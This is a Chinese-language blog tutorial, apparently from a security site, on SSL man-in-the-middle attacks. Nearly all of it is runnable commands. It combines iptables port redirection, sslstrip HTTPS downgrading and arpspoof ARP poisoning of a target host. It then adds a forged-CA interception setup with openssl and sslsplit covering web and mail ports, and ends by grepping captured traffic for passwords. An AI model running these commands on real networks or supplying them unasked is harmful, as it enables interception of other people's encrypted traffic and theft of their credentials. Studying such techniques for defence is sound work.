Home 应用安全 SSL中间人攻击

 

测试环境:

Ubuntu 14.04.1 LTS

一、中间人代理攻击

1.原理图:

sslstrip.jpg

         2.工具:

1sslstrip:

    sudo apt-get install sslstrip

2arpspoof:

    sudo apt-get install dsniff

3.过程:

1)配置iptables转发:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

    iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 10000

2)启动sslstrip监听本地端口:

    sslstrip -l 10000 –a

3)开始ARP欺骗:

    arpspoof -i eth0 -t 192.168.132.130 -r 192.168.132.2

    PS:arpspoof并不提供转发功能。

二、证书伪造攻击:

1.       工具:

1openssl:

    sudo apt-get install openssl

2sslsplit:

    git clone https://github.com/droe/sslsplit.git

    make & sudo make install

安装依赖包:

    apt-get install libssl-dev libevent-dev

    3arpspoof

2.       过程:

1)  生成数字证书:

openssl genrsa -out ca.key 2048

openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

2)  开启iptables转发:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-ports 8080

iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8443

iptables -t nat -A PREROUTING -p tcp –dport 587 -j REDIRECT –to-ports 8443

iptables -t nat -A PREROUTING -p tcp –dport 465 -j REDIRECT –to-ports 8443

iptables -t nat -A PREROUTING -p tcp –dport 993 -j REDIRECT –to-ports 8443

iptables -t nat -A PREROUTING -p tcp –dport 995 -j REDIRECT –to-ports 8443

3)  启动sslsplit监听本地端口:

参数:

-k 指定私钥key文件,进行欺骗

-c 指定Root CA证书文件

-D Debug模式,用于输出SSLSplit状态,建议使用时加上

-j 指定log目录地址

-S 指定-j参数目录下需要记录截断GETPOST请求的子目录地址

-l 指定存储的连接信息文件

ssl IP 端口 指定ssl需要监听的端口

tcp IP 端口 指定tcp需要监听的端口

mkdir log

sslsplit -D -l connect.log -j ./ -S log/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

4)  启动ARP

arpspoof -i eth0 -t 192.168.132.130 -r 192.168.132.2

5)  查看截取到的数据:

cd log

grep -rn ‘password’ *

           

打赏
0 comment

You may also like

Leave a Comment

*

code